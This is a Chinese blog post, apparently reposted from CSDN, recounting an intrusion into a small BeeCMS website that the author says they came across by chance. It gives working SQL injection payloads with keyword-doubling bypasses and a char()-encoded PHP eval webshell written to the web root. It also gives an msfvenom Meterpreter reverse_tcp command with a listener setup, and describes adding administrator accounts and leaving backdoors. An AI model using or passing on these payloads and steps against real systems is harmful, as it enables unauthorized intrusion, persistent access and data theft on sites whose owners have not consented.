0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記錄某一次無意點(diǎn)開的一個(gè)小網(wǎng)站的滲透過程

工程師鄧生 ? 來源:CSDN ? 作者:Deilty ? 2022-09-09 09:09 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

記錄某一次無意點(diǎn)開的一個(gè)小網(wǎng)站的滲透過程,幸運(yùn)的是搭建平臺(tái)是phpstudy,cms是beecms,beecms有通用漏洞,然后去網(wǎng)上找了資料,成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過程

無意點(diǎn)開一個(gè)網(wǎng)站,發(fā)現(xiàn)網(wǎng)站比較小,且看起來比較老,然后發(fā)現(xiàn)logo沒有改,于是乎去百度搜索這個(gè)cms,發(fā)現(xiàn)有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

這里運(yùn)氣比較好,沒有更改后臺(tái)地址,還是默認(rèn)地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通過通用漏洞發(fā)先后臺(tái)管理處存在sql注入漏洞,直接輸入admin’,然后就會(huì)報(bào)錯(cuò),這里用萬能密碼不能登陸,看來還是得通過上面得通用漏洞來進(jìn)行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到輸入payload后,頁面返回正常,從而可以判斷有sql注入,這里采用雙寫進(jìn)行繞過a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

發(fā)現(xiàn)這個(gè)注入點(diǎn)后,就有各種各樣的注入方式了,通過sql語句寫入一句話,sqlmap一把梭,手工注入得到賬號(hào)密碼等等,怎么方便怎么來,這里我把幾種方法都寫一下,看看那種方法可以

方法一

1.通過post抓包sqlmap一把梭,dump出管理員賬號(hào)密碼,進(jìn)后臺(tái)找上傳點(diǎn)

2.一把梭,發(fā)現(xiàn)并沒有,使用腳本也沒有繞過

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通過burp抓包,寫入一句話,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發(fā)現(xiàn)寫入失敗,前面講到有防護(hù),這里通過hex編碼或者char函數(shù)繞過

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.對(duì)shell部分進(jìn)行編碼

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.寫入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時(shí)候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x,看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜,運(yùn)氣好,默認(rèn)目錄

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蟻劍連接,成功連接,至此getshell完畢,下來就是后滲透階段,后面會(huì)講

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函數(shù)繞過:mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一樣成功寫入

1.寫入成功后,菜刀可以連接,我們?cè)L問寫入的文件,驚奇的發(fā)現(xiàn)竟然有admin,和一串md5碼,大膽猜測可能是后臺(tái)賬號(hào)和密碼,試一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陸,然后就是后臺(tái)找上傳了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后滲透

通過whoami查看權(quán)限,發(fā)現(xiàn)是admin權(quán)限,但是不是最高權(quán)限,我們要提到最高權(quán)限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通過msf生成木馬提權(quán),payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過蟻劍上傳木馬,并執(zhí)行。執(zhí)行之前打開msf使用模塊use exploit/multi/handler,設(shè)置相應(yīng)參數(shù),然后開始監(jiān)聽

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么問題,用這個(gè)沒有成功,那么只能通過大馬提權(quán)了

方法二

1.上傳大馬,此處應(yīng)該有狗或者盾之類的,用的免殺,成功上傳

2.訪問大馬

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.這里提權(quán)方式很多,就不細(xì)說了,有大馬之后很多操作都可以引刃而解了,開放端口,添加賬號(hào),留后門。。等等

4.創(chuàng)建admin權(quán)限賬號(hào)之后,登陸服務(wù)器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的發(fā)現(xiàn)

通過掃描目錄,還發(fā)現(xiàn)有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過phpmyadmin登陸,發(fā)現(xiàn)是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫入一句話getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、總結(jié) 1.前臺(tái)sql注入獲取用戶名密碼,進(jìn)入后臺(tái)找上傳 2.SQL注入語句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權(quán)

至此,滲透結(jié)束。


審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    783

    瀏覽量

    45121
  • 編碼
    +關(guān)注

    關(guān)注

    6

    文章

    968

    瀏覽量

    55754
  • ASCII
    +關(guān)注

    關(guān)注

    5

    文章

    172

    瀏覽量

    35857

原文標(biāo)題:實(shí)戰(zhàn) | 一次小網(wǎng)站滲透過程

文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    一次消諧裝置與二消諧裝置區(qū)別、一次消諧器與二消諧器的區(qū)別

    一次消諧器與二消諧器是電力系統(tǒng)中用于抑制諧振過電壓的不同裝置,主要區(qū)別如下: 安裝位置:一次消諧器串聯(lián)于電壓互感器(PT)一次側(cè)中性點(diǎn)與地之間,直接承受高電壓;二
    的頭像 發(fā)表于 05-07 09:58 ?1066次閱讀
    <b class='flag-5'>一次</b>消諧裝置與二<b class='flag-5'>次</b>消諧裝置區(qū)別、<b class='flag-5'>一次</b>消諧器與二<b class='flag-5'>次</b>消諧器的區(qū)別

    一次性使用心電電極片性能測試 深圳

    一次性使用心電電極片性能測試 :YICE0196 心電電極電性能測試儀、 心電電極電性能測試儀(SEAM) 心電電極性能測試儀
    的頭像 發(fā)表于 03-19 11:27 ?389次閱讀
    <b class='flag-5'>一次</b>性使用心電電極片性能測試 深圳<b class='flag-5'>一</b>測

    歐度MEDI-SNAP一次性醫(yī)用插頭發(fā)布

    歐度MEDI-SNAP一次性醫(yī)用插頭產(chǎn)品組加入新成員啦!為滿足一次性內(nèi)窺鏡、一次性手術(shù)消融刀等設(shè)備中的耗材需求,歐度將ODU MEDI-SNAP一次性醫(yī)用插頭的鎖定方式擴(kuò)展為插拔自鎖和
    的頭像 發(fā)表于 02-21 16:00 ?497次閱讀

    ads8568采集基本正常,但可能在某一次上電后,出現(xiàn)不工作的狀態(tài),為什么?

    現(xiàn)在遇到這樣問題:ads8568采集基本正常,但可能在某一次上電后,出現(xiàn)不工作的狀態(tài)(busy為高),必須重新上電才能正常,CONVST、RD、CS等輸入正常 說明:此AD芯片掛在fpga上,供電電壓HVDD和HVSS連接+5v,-5v,與模擬電壓共用 DVDD:+3.3v 數(shù)字
    發(fā)表于 02-06 08:00

    一次性鋰電池為什么不能充電?文講清!

    一次性鋰電池不能充電,是由它的正負(fù)極材料、電解液等決定的。雖然它不能充電,但在某些場景下,還是有著不可替代的作用。希望通過這篇文章,能讓大家對(duì)一次性鋰電池有更深入的了解,以后在生活中使用的時(shí)候,也能更安全、更環(huán)保。
    的頭像 發(fā)表于 01-23 14:11 ?1203次閱讀
    <b class='flag-5'>一次</b>性鋰電池為什么不能充電?<b class='flag-5'>一</b>文講清!

    文帶你了解透過率測量

    透過率的定義光透過能力,即透光率,描述的是特定條件下,物體透過的光量與其接收的入射光量之間的比例。在光的傳播過程中,部分光線會(huì)被物體吸收,而另
    的頭像 發(fā)表于 11-04 13:00 ?791次閱讀
    <b class='flag-5'>一</b>文帶你了解<b class='flag-5'>透過</b>率測量

    一次電源與二電源有什么不同

    在電力系統(tǒng)和電子設(shè)備的供電領(lǐng)域中,一次電源與二電源是兩個(gè)至關(guān)重要的概念。它們各自承擔(dān)著不同的功能和角色,共同確保電力供應(yīng)的穩(wěn)定性和可靠性。本文將對(duì)一次電源與二
    的頭像 發(fā)表于 10-10 14:10 ?5061次閱讀

    一次電池分類以及應(yīng)用場景詳解

    01 一次電池簡介 一次電池即原電池(primarycell、primarybattery)(俗稱干電池),是放電后不能再充電使其復(fù)原的電池,通電電池有正極、負(fù)極電解以及容器和隔膜等組成。 一次電池
    的頭像 發(fā)表于 09-30 17:52 ?2738次閱讀
    <b class='flag-5'>一次</b>電池分類以及應(yīng)用場景詳解

    ODU MEDI-SNAP一次性醫(yī)用插拔自鎖插頭產(chǎn)品介紹

    為滿足一次性內(nèi)窺鏡、一次性手術(shù)消融刀等設(shè)備中的耗材需求,歐度全新推出了MEDI-SNAP一次性醫(yī)用插拔自鎖插頭,為醫(yī)療客戶打造了組在品質(zhì)與經(jīng)濟(jì)性上均能滿足需求的高性價(jià)比解決方案。
    的頭像 發(fā)表于 09-10 09:59 ?853次閱讀

    無線時(shí)鐘秒轉(zhuǎn)一次思路怎么設(shè)置

    創(chuàng)建個(gè)無線時(shí)鐘,使其每秒轉(zhuǎn)動(dòng)一次,涉及到多個(gè)領(lǐng)域的知識(shí),包括電子工程、無線通信、編程和機(jī)械設(shè)計(jì)。 1. 項(xiàng)目概述 無線時(shí)鐘每秒轉(zhuǎn)動(dòng)一次的項(xiàng)目可以分為以下幾個(gè)主要部分: 機(jī)械設(shè)計(jì) :設(shè)
    的頭像 發(fā)表于 09-07 09:21 ?560次閱讀

    電氣一次設(shè)備有哪些其功能是什么

    電氣一次設(shè)備是指那些直接參與電能的生產(chǎn)、轉(zhuǎn)換以及輸配過程的設(shè)備。這些設(shè)備在電力系統(tǒng)中扮演著核心角色,確保電能從生產(chǎn)到消費(fèi)的各個(gè)環(huán)節(jié)能夠高效、安全地進(jìn)行。具體來說,電氣一次設(shè)備主要包括以下幾大類
    的頭像 發(fā)表于 08-27 14:50 ?2179次閱讀

    labview如何做到一次觸發(fā)采集一次

    最近在做一個(gè)電壓測試模塊,要求是在一個(gè)時(shí)間段內(nèi),出現(xiàn)個(gè)上升沿觸發(fā)采集,并且只采集一次,采集次數(shù)為出現(xiàn)上升沿的次數(shù),采集時(shí)間,采樣率及單
    發(fā)表于 08-07 10:16

    記錄一次RPC服務(wù)有損上線的分析過程

    1. 問題背景 某應(yīng)用在啟動(dòng)完提供JSF服務(wù)后,短時(shí)間內(nèi)出現(xiàn)了大量的空指針異常。 分析日志,發(fā)現(xiàn)是服務(wù)依賴的藏經(jīng)閣配置數(shù)據(jù)未加載完成導(dǎo)致。即所謂的 有損上線 或者是 直接發(fā)布 , 當(dāng) 應(yīng)用啟動(dòng)時(shí),service還沒加載完,就開始對(duì)外提供服務(wù),導(dǎo)致失敗調(diào)用 。 關(guān)鍵代碼如下 數(shù)據(jù)的初始化加載是通過實(shí)現(xiàn)CommandLineRunner接口完成的 @Componentpublic class LoadSystemArgsListener implements CommandLineRunner { @Resource private CacheLoader cjgConfigCacheLoader; @Override public void run(String...
    的頭像 發(fā)表于 07-30 09:58 ?482次閱讀
    <b class='flag-5'>記錄</b><b class='flag-5'>一次</b>RPC服務(wù)有損上線的分析<b class='flag-5'>過程</b>

    如何使用ESP8266-01構(gòu)建個(gè)電池供電的數(shù)據(jù)記錄器?

    我正在嘗試使用 ESP8266-01 構(gòu)建個(gè)電池供電的數(shù)據(jù)記錄器。它將每小時(shí)進(jìn)行一次測量,通過 WiFi 報(bào)告,然后再 60 分鐘不做任何事情(睡眠)。時(shí)序?qū)⒂蒚PL5111芯片處理
    發(fā)表于 07-19 06:53

    如何簡易測試一次消諧器10-35千伏

    如何簡易測量35kV一次消諧器 微機(jī)消諧在測試25赫茲的情況下,參數(shù)會(huì)有哪些變化 微機(jī)消諧故障記錄儲(chǔ)存多久 數(shù)據(jù)中心用接地電阻柜KYN28柜體,耐用美觀 一次消諧器出廠測試直流10mA和1mA的參數(shù)重要性 風(fēng)電光伏用變壓器中性點(diǎn)
    發(fā)表于 07-16 08:32

    電子發(fā)燒友

    中國電子工程師最喜歡的網(wǎng)站

    • 2931785位工程師會(huì)員交流學(xué)習(xí)
    • 獲取您個(gè)性化的科技前沿技術(shù)信息
    • 參加活動(dòng)獲取豐厚的禮品